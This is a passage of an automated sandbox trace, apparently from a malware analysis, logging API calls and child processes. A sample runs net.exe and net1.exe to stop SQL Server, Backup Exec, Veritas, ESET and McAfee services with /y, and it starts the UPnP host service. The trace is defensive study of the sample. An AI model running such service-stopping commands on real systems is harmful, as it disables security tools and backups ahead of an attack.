WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x786178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0097.038] WriteFile (in: hFile=0x0, lpBuffer=0x786178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ffc68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc68, lpOverlapped=0x0) returned 0 [0097.038] LocalFree (hMem=0x786178) returned 0x0 [0097.038] GetFileType (hFile=0x0) returned 0x0 [0097.038] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x786178 [0097.038] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x786178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0097.038] WriteFile (in: hFile=0x0, lpBuffer=0x786178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffc68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffc68, lpOverlapped=0x0) returned 0 [0097.038] LocalFree (hMem=0x786178) returned 0x0 [0097.039] NetApiBufferFree (Buffer=0x781ae8) returned 0x0 [0097.039] NetApiBufferFree (Buffer=0x781b00) returned 0x0 [0097.039] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0097.039] exit (_Code=2) Process: id = "78" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2755a000" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecDiveciMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 443 os_tid = 0xe94 Process: id = "79" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2045f000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ESHASRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 444 os_tid = 0xeac Process: id = "80" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x725c9000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x934" cmd_line = "C:\\Windows\\system32\\net1 stop mfewc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 445 os_tid = 0xebc [0099.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29f83c | out: lpSystemTimeAsFileTime=0x29f83c*(dwLowDateTime=0x10ef3e90, dwHighDateTime=0x1d6f0d1)) [0099.037] GetCurrentProcessId () returned 0xeb8 [0099.037] GetCurrentThreadId () returned 0xebc [0099.037] GetTickCount () returned 0x114d0b8 [0099.037] QueryPerformanceCounter (in: lpPerformanceCount=0x29f834 | out: lpPerformanceCount=0x29f834*=21813756475) returned 1 [0099.037] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0099.037] __set_app_type (_Type=0x1) [0099.037] __p__fmode () returned 0x770331f4 [0099.037] __p__commode () returned 0x770331fc [0099.037] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0099.038] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0099.038] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.038] GetConsoleOutputCP () returned 0x1b5 [0099.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0099.040] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.044] sprintf_s (in: _DstBuf=0x29f7f4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.044] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.046] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0099.046] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.046] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfewc /y" [0099.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29f5c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0099.046] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x5e) returned 0x703ac8 [0099.046] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.046] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f7c4 | out: Buffer=0x29f7c4*=0x701ad0) returned 0x0 [0099.046] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f7c4 | out: Buffer=0x29f7c4*=0x701ae8) returned 0x0 [0099.046] _fileno (_File=0x77032900) returned -2 [0099.046] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0099.046] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0099.046] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0099.047] _wcsicmp (_String1="config", _String2="stop") returned -16 [0099.047] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0099.047] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0099.047] _wcsicmp (_String1="file", _String2="stop") returned -13 [0099.047] _wcsicmp (_String1="files", _String2="stop") returned -13 [0099.047] _wcsicmp (_String1="group", _String2="stop") returned -12 [0099.047] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0099.047] _wcsicmp (_String1="help", _String2="stop") returned -11 [0099.047] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0099.047] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0099.047] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0099.047] _wcsicmp (_String1="session", _String2="stop") returned -15 [0099.047] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0099.047] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0099.047] _wcsicmp (_String1="share", _String2="stop") returned -12 [0099.047] _wcsicmp (_String1="start", _String2="stop") returned -14 [0099.047] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0099.047] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0099.047] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0099.047] _wcsicmp (_String1="accounts", _String2="mfewc") returned -12 [0099.047] _wcsicmp (_String1="computer", _String2="mfewc") returned -10 [0099.047] _wcsicmp (_String1="config", _String2="mfewc") returned -10 [0099.047] _wcsicmp (_String1="continue", _String2="mfewc") returned -10 [0099.047] _wcsicmp (_String1="cont", _String2="mfewc") returned -10 [0099.047] _wcsicmp (_String1="file", _String2="mfewc") returned -7 [0099.047] _wcsicmp (_String1="files", _String2="mfewc") returned -7 [0099.047] _wcsicmp (_String1="group", _String2="mfewc") returned -6 [0099.047] _wcsicmp (_String1="groups", _String2="mfewc") returned -6 [0099.047] _wcsicmp (_String1="help", _String2="mfewc") returned -5 [0099.048] _wcsicmp (_String1="helpmsg", _String2="mfewc") returned -5 [0099.048] _wcsicmp (_String1="localgroup", _String2="mfewc") returned -1 [0099.048] _wcsicmp (_String1="pause", _String2="mfewc") returned 3 [0099.048] _wcsicmp (_String1="session", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="sessions", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="sess", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="share", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="start", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="stats", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="statistics", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="stop", _String2="mfewc") returned 6 [0099.048] _wcsicmp (_String1="time", _String2="mfewc") returned 7 [0099.048] _wcsicmp (_String1="user", _String2="mfewc") returned 8 [0099.048] _wcsicmp (_String1="users", _String2="mfewc") returned 8 [0099.048] _wcsicmp (_String1="msg", _String2="mfewc") returned 13 [0099.048] _wcsicmp (_String1="messenger", _String2="mfewc") returned -1 [0099.048] _wcsicmp (_String1="receiver", _String2="mfewc") returned 5 [0099.048] _wcsicmp (_String1="rcv", _String2="mfewc") returned 5 [0099.048] _wcsicmp (_String1="netpopup", _String2="mfewc") returned 1 [0099.048] _wcsicmp (_String1="redirector", _String2="mfewc") returned 5 [0099.048] _wcsicmp (_String1="redir", _String2="mfewc") returned 5 [0099.048] _wcsicmp (_String1="rdr", _String2="mfewc") returned 5 [0099.048] _wcsicmp (_String1="workstation", _String2="mfewc") returned 10 [0099.048] _wcsicmp (_String1="work", _String2="mfewc") returned 10 [0099.048] _wcsicmp (_String1="wksta", _String2="mfewc") returned 10 [0099.048] _wcsicmp (_String1="prdr", _String2="mfewc") returned 3 [0099.048] _wcsicmp (_String1="devrdr", _String2="mfewc") returned -9 [0099.048] _wcsicmp (_String1="lanmanworkstation", _String2="mfewc") returned -1 [0099.049] _wcsicmp (_String1="server", _String2="mfewc") returned 6 [0099.049] _wcsicmp (_String1="svr", _String2="mfewc") returned 6 [0099.049] _wcsicmp (_String1="srv", _String2="mfewc") returned 6 [0099.049] _wcsicmp (_String1="lanmanserver", _String2="mfewc") returned -1 [0099.049] _wcsicmp (_String1="alerter", _String2="mfewc") returned -12 [0099.049] _wcsicmp (_String1="netlogon", _String2="mfewc") returned 1 [0099.049] _wcsupr (in: _String="mfewc" | out: _String="MFEWC") returned="MFEWC" [0099.049] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x705488 [0099.052] GetServiceKeyNameW (in: hSCManager=0x705488, lpDisplayName="MFEWC", lpServiceName=0x3faaf0, lpcchBuffer=0x29f760 | out: lpServiceName="", lpcchBuffer=0x29f760) returned 0 [0099.052] _wcsicmp (_String1="msg", _String2="MFEWC") returned 13 [0099.052] _wcsicmp (_String1="messenger", _String2="MFEWC") returned -1 [0099.052] _wcsicmp (_String1="receiver", _String2="MFEWC") returned 5 [0099.052] _wcsicmp (_String1="rcv", _String2="MFEWC") returned 5 [0099.052] _wcsicmp (_String1="redirector", _String2="MFEWC") returned 5 [0099.052] _wcsicmp (_String1="redir", _String2="MFEWC") returned 5 [0099.052] _wcsicmp (_String1="rdr", _String2="MFEWC") returned 5 [0099.053] _wcsicmp (_String1="workstation", _String2="MFEWC") returned 10 [0099.053] _wcsicmp (_String1="work", _String2="MFEWC") returned 10 [0099.053] _wcsicmp (_String1="wksta", _String2="MFEWC") returned 10 [0099.053] _wcsicmp (_String1="prdr", _String2="MFEWC") returned 3 [0099.053] _wcsicmp (_String1="devrdr", _String2="MFEWC") returned -9 [0099.053] _wcsicmp (_String1="lanmanworkstation", _String2="MFEWC") returned -1 [0099.053] _wcsicmp (_String1="server", _String2="MFEWC") returned 6 [0099.053] _wcsicmp (_String1="svr", _String2="MFEWC") returned 6 [0099.053] _wcsicmp (_String1="srv", _String2="MFEWC") returned 6 [0099.053] _wcsicmp (_String1="lanmanserver", _String2="MFEWC") returned -1 [0099.053] _wcsicmp (_String1="alerter", _String2="MFEWC") returned -12 [0099.053] _wcsicmp (_String1="netlogon", _String2="MFEWC") returned 1 [0099.053] NetServiceControl (in: servername=0x0, service="MFEWC", opcode=0x0, arg=0x0, bufptr=0x29f75c | out: bufptr=0x29f75c) returned 0x889 [0099.054] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.054] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0099.055] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0099.056] GetFileType (hFile=0x0) returned 0x0 [0099.056] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x703ea8 [0099.056] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x703ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0099.056] WriteFile (in: hFile=0x0, lpBuffer=0x703ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29f69c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f69c, lpOverlapped=0x0) returned 0 [0099.056] LocalFree (hMem=0x703ea8) returned 0x0 [0099.056] GetFileType (hFile=0x0) returned 0x0 [0099.056] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706150 [0099.056] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0099.056] WriteFile (in: hFile=0x0, lpBuffer=0x706150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f69c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f69c, lpOverlapped=0x0) returned 0 [0099.056] LocalFree (hMem=0x706150) returned 0x0 [0099.056] _ultow (in: _Dest=0x889, _Radix=2750156 | out: _Dest=0x889) returned="2185" [0099.056] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0099.056] GetFileType (hFile=0x0) returned 0x0 [0099.056] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x706150 [0099.056] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x706150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0099.057] WriteFile (in: hFile=0x0, lpBuffer=0x706150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29f6a8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6a8, lpOverlapped=0x0) returned 0 [0099.057] LocalFree (hMem=0x706150) returned 0x0 [0099.057] GetFileType (hFile=0x0) returned 0x0 [0099.057] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706150 [0099.058] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0099.058] WriteFile (in: hFile=0x0, lpBuffer=0x706150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f6a8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6a8, lpOverlapped=0x0) returned 0 [0099.058] LocalFree (hMem=0x706150) returned 0x0 [0099.059] NetApiBufferFree (Buffer=0x701ad0) returned 0x0 [0099.059] NetApiBufferFree (Buffer=0x701ae8) returned 0x0 [0099.059] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfewc /y" [0099.059] exit (_Code=2) Process: id = "81" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x2766a000" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop PDVFSService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 446 os_tid = 0xecc Process: id = "82" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x31b79000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0xa34" cmd_line = "C:\\Windows\\system32\\net1 start upnphost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 447 os_tid = 0xee0 [0099.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fdec | out: lpSystemTimeAsFileTime=0x22fdec*(dwLowDateTime=0x111091d0, dwHighDateTime=0x1d6f0d1)) [0099.510] GetCurrentProcessId () returned 0xedc [0099.510] GetCurrentThreadId () returned 0xee0 [0099.510] GetTickCount () returned 0x114d192 [0099.510] QueryPerformanceCounter (in: lpPerformanceCount=0x22fde4 | out: lpPerformanceCount=0x22fde4*=21861055391) returned 1 [0099.510] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0099.510] __set_app_type (_Type=0x1) [0099.510] __p__fmode () returned 0x770331f4 [0099.510] __p__commode () returned 0x770331fc [0099.510] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0099.510] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0099.511] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.511] GetConsoleOutputCP () returned 0x1b5 [0099.511] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0099.511] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.514] sprintf_s (in: _DstBuf=0x22fda4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0099.514] setlocale (category=0, locale=".437") returned="English_United States.437" [0099.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0099.516] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.517] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start upnphost /y" [0099.517] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22fb70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0099.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x66) returned 0x2e3ad8 [0099.517] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0099.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fd74 | out: Buffer=0x22fd74*=0x2e1ae0) returned 0x0 [0099.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22fd74 | out: Buffer=0x22fd74*=0x2e1af8) returned 0x0 [0099.517] _fileno (_File=0x77032900) returned -2 [0099.517] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0099.517] _wcsicmp (_String1="accounts", _String2="start") returned -18 [0099.517] _wcsicmp (_String1="computer", _String2="start") returned -16 [0099.517] _wcsicmp (_String1="config", _String2="start") returned -16 [0099.517] _wcsicmp (_String1="continue", _String2="start") returned -16 [0099.517] _wcsicmp (_String1="cont", _String2="start") returned -16 [0099.517] _wcsicmp (_String1="file", _String2="start") returned -13 [0099.517] _wcsicmp (_String1="files", _String2="start") returned -13 [0099.517] _wcsicmp (_String1="group", _String2="start") returned -12 [0099.517] _wcsicmp (_String1="groups", _String2="start") returned -12 [0099.518] _wcsicmp (_String1="help", _String2="start") returned -11 [0099.518] _wcsicmp (_String1="helpmsg", _String2="start") returned -11 [0099.518] _wcsicmp (_String1="localgroup", _String2="start") returned -7 [0099.518] _wcsicmp (_String1="pause", _String2="start") returned -3 [0099.518] _wcsicmp (_String1="session", _String2="start") returned -15 [0099.518] _wcsicmp (_String1="sessions", _String2="start") returned -15 [0099.518] _wcsicmp (_String1="sess", _String2="start") returned -15 [0099.518] _wcsicmp (_String1="share", _String2="start") returned -12 [0099.518] _wcsicmp (_String1="start", _String2="start") returned 0 [0099.518] _wcsicmp (_String1="accounts", _String2="upnphost") returned -20 [0099.518] _wcsicmp (_String1="computer", _String2="upnphost") returned -18 [0099.518] _wcsicmp (_String1="config", _String2="upnphost") returned -18 [0099.518] _wcsicmp (_String1="continue", _String2="upnphost") returned -18 [0099.518] _wcsicmp (_String1="cont", _String2="upnphost") returned -18 [0099.518] _wcsicmp (_String1="file", _String2="upnphost") returned -15 [0099.518] _wcsicmp (_String1="files", _String2="upnphost") returned -15 [0099.518] _wcsicmp (_String1="group", _String2="upnphost") returned -14 [0099.518] _wcsicmp (_String1="groups", _String2="upnphost") returned -14 [0099.518] _wcsicmp (_String1="help", _String2="upnphost") returned -13 [0099.518] _wcsicmp (_String1="helpmsg", _String2="upnphost") returned -13 [0099.518] _wcsicmp (_String1="localgroup", _String2="upnphost") returned -9 [0099.518] _wcsicmp (_String1="pause", _String2="upnphost") returned -5 [0099.518] _wcsicmp (_String1="session", _String2="upnphost") returned -2 [0099.518] _wcsicmp (_String1="sessions", _String2="upnphost") returned -2 [0099.518] _wcsicmp (_String1="sess", _String2="upnphost") returned -2 [0099.518] _wcsicmp (_String1="share", _String2="upnphost") returned -2 [0099.518] _wcsicmp (_String1="start", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="stats", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="statistics", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="stop", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="time", _String2="upnphost") returned -1 [0099.519] _wcsicmp (_String1="user", _String2="upnphost") returned 3 [0099.519] _wcsicmp (_String1="users", _String2="upnphost") returned 3 [0099.519] _wcsicmp (_String1="msg", _String2="upnphost") returned -8 [0099.519] _wcsicmp (_String1="messenger", _String2="upnphost") returned -8 [0099.519] _wcsicmp (_String1="receiver", _String2="upnphost") returned -3 [0099.519] _wcsicmp (_String1="rcv", _String2="upnphost") returned -3 [0099.519] _wcsicmp (_String1="netpopup", _String2="upnphost") returned -7 [0099.519] _wcsicmp (_String1="redirector", _String2="upnphost") returned -3 [0099.519] _wcsicmp (_String1="redir", _String2="upnphost") returned -3 [0099.519] _wcsicmp (_String1="rdr", _String2="upnphost") returned -3 [0099.519] _wcsicmp (_String1="workstation", _String2="upnphost") returned 2 [0099.519] _wcsicmp (_String1="work", _String2="upnphost") returned 2 [0099.519] _wcsicmp (_String1="wksta", _String2="upnphost") returned 2 [0099.519] _wcsicmp (_String1="prdr", _String2="upnphost") returned -5 [0099.519] _wcsicmp (_String1="devrdr", _String2="upnphost") returned -17 [0099.519] _wcsicmp (_String1="lanmanworkstation", _String2="upnphost") returned -9 [0099.519] _wcsicmp (_String1="server", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="svr", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="srv", _String2="upnphost") returned -2 [0099.519] _wcsicmp (_String1="lanmanserver", _String2="upnphost") returned -9 [0099.520] _wcsicmp (_String1="alerter", _String2="upnphost") returned -20 [0099.520] _wcsicmp (_String1="netlogon", _String2="upnphost") returned -7 [0099.520] _wcsupr (in: _String="upnphost" | out: _String="UPNPHOST") returned="UPNPHOST" [0099.520] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e54a8 [0099.522] GetServiceKeyNameW (in: hSCManager=0x2e54a8, lpDisplayName="UPNPHOST", lpServiceName=0x3faaf0, lpcchBuffer=0x22fd0c | out: lpServiceName="", lpcchBuffer=0x22fd0c) returned 0 [0099.522] _wcsicmp (_String1="msg", _String2="UPNPHOST") returned -8 [0099.522] _wcsicmp (_String1="messenger", _String2="UPNPHOST") returned -8 [0099.523] _wcsicmp (_String1="receiver", _String2="UPNPHOST") returned -3 [0099.523] _wcsicmp (_String1="rcv", _String2="UPNPHOST") returned -3 [0099.523] _wcsicmp (_String1="redirector", _String2="UPNPHOST") returned -3 [0099.523] _wcsicmp (_String1="redir", _String2="UPNPHOST") returned -3 [0099.523] _wcsicmp (_String1="rdr", _String2="UPNPHOST") returned -3 [0099.523] _wcsicmp (_String1="workstation", _String2="UPNPHOST") returned 2 [0099.523] _wcsicmp (_String1="work", _String2="UPNPHOST") returned 2 [0099.523] _wcsicmp (_String1="wksta", _String2="UPNPHOST") returned 2 [0099.523] _wcsicmp (_String1="prdr", _String2="UPNPHOST") returned -5 [0099.523] _wcsicmp (_String1="devrdr", _String2="UPNPHOST") returned -17 [0099.523] _wcsicmp (_String1="lanmanworkstation", _String2="UPNPHOST") returned -9 [0099.523] _wcsicmp (_String1="server", _String2="UPNPHOST") returned -2 [0099.523] _wcsicmp (_String1="svr", _String2="UPNPHOST") returned -2 [0099.523] _wcsicmp (_String1="srv", _String2="UPNPHOST") returned -2 [0099.523] _wcsicmp (_String1="lanmanserver", _String2="UPNPHOST") returned -9 [0099.523] _wcsicmp (_String1="alerter", _String2="UPNPHOST") returned -20 [0099.523] _wcsicmp (_String1="netlogon", _String2="UPNPHOST") returned -7 [0099.523] NetServiceControl (in: servername=0x0, service="UPNPHOST", opcode=0x0, arg=0x0, bufptr=0x22fd00 | out: bufptr=0x22fd00) returned 0x0 [0099.550] NetServiceInstall (in: servername=0x0, service="UPNPHOST", argc=0x0, argv=0x0, bufptr=0x22fcf0 | out: bufptr=0x22fcf0) returned 0x0 [0099.619] free (_Block=0x0) [0099.620] GetServiceDisplayNameW (in: hSCManager=0x2e54a8, lpServiceName="UPNPHOST", lpDisplayName=0x401fc0, lpcchBuffer=0x22fcc8 | out: lpDisplayName="UPnP Device Host", lpcchBuffer=0x22fcc8) returned 1 [0099.620] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0099.620] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 